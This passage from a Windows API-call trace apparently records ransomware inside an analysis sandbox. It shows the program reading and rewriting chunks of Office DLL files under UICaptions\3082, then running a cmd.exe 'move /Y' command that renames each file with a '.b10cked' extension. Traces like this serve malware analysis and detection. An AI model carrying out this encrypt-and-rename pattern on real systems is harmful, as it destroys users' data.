Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0174.072] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0174.072] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0174.072] ReleaseMutex (hMutex=0xf8) returned 1 [0174.072] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0174.072] ReleaseMutex (hMutex=0xf8) returned 1 [0174.072] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0174.072] ReleaseMutex (hMutex=0xf8) returned 1 [0174.072] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0174.072] ReleaseMutex (hMutex=0xf8) returned 1 [0174.072] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\wwintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0174.072] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.072] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x110b60 [0174.072] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.072] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=23086160735) returned 1 [0174.072] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.072] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x110b60 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x110b60 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x110b60 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x110b60 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x110b60 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x110b60 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x110b60 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x110b60 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.073] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.074] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x110b60 [0174.074] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.074] SetFilePointer (in: hFile=0x120, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x110678 [0174.074] ReadFile (in: hFile=0x120, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0174.275] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0174.275] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0174.275] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x110b60 [0174.275] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0174.275] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0174.275] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0174.275] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x110b60 [0174.275] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0174.276] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0174.276] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0174.302] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0174.320] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0174.321] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0174.321] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0174.322] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0174.322] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0174.322] SetFilePointer (in: hFile=0x120, lDistanceToMove=393216, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x60000 [0174.322] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0174.397] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0174.535] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0174.538] SetFilePointer (in: hFile=0x120, lDistanceToMove=393216, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x60000 [0174.538] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0174.538] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0174.538] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0174.538] SetFilePointer (in: hFile=0x120, lDistanceToMove=786432, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xc0000 [0174.538] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0174.662] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0174.663] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0174.665] SetFilePointer (in: hFile=0x120, lDistanceToMove=786432, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xc0000 [0174.665] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0174.665] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0174.666] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0174.666] SetFilePointer (in: hFile=0x120, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xf0b60 [0174.666] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0174.761] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0174.762] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0174.763] SetFilePointer (in: hFile=0x120, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xf0b60 [0174.763] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0174.764] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0174.764] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0174.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WWINTL.REST.trx_dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0174.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WWINTL.REST.trx_dll", cchWideChar=19, lpMultiByteStr=0x1328744, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WWINTL.REST.trx_dll", lpUsedDefaultChar=0x0) returned 19 [0174.769] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x110b60 [0174.769] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0174.769] CloseHandle (hObject=0x120) returned 1 [0174.802] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\WWINTL.REST.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~2.TRX") returned 0x3c [0174.803] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0174.804] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.REST.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\WWINTL.REST.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xd7c, dwThreadId=0xe60)) returned 1 [0174.850] CloseHandle (hObject=0x1b4) returned 1 [0174.850] CloseHandle (hObject=0x120) returned 1 [0174.850] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0174.850] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0174.850] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0174.850] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0174.850] ReleaseMutex (hMutex=0xf8) returned 1 [0174.850] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0174.850] ReleaseMutex (hMutex=0xf8) returned 1 [0174.850] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0174.850] ReleaseMutex (hMutex=0xf8) returned 1 [0174.850] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0174.850] ReleaseMutex (hMutex=0xf8) returned 1 [0174.851] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\xlintl32.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0174.851] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.851] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x23960 [0174.851] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.851] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=23164025759) returned 1 [0174.851] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.851] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x23960 [0174.851] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.851] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.851] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x23960 [0174.851] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.851] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0174.851] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x23960 [0174.852] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0174.852] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.852] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x23960 [0174.852] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.852] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.852] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x23960 [0174.852] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.852] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.852] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x23960 [0174.852] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.852] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.852] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x23960 [0174.852] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.852] SetFilePointer (in: hFile=0x120, 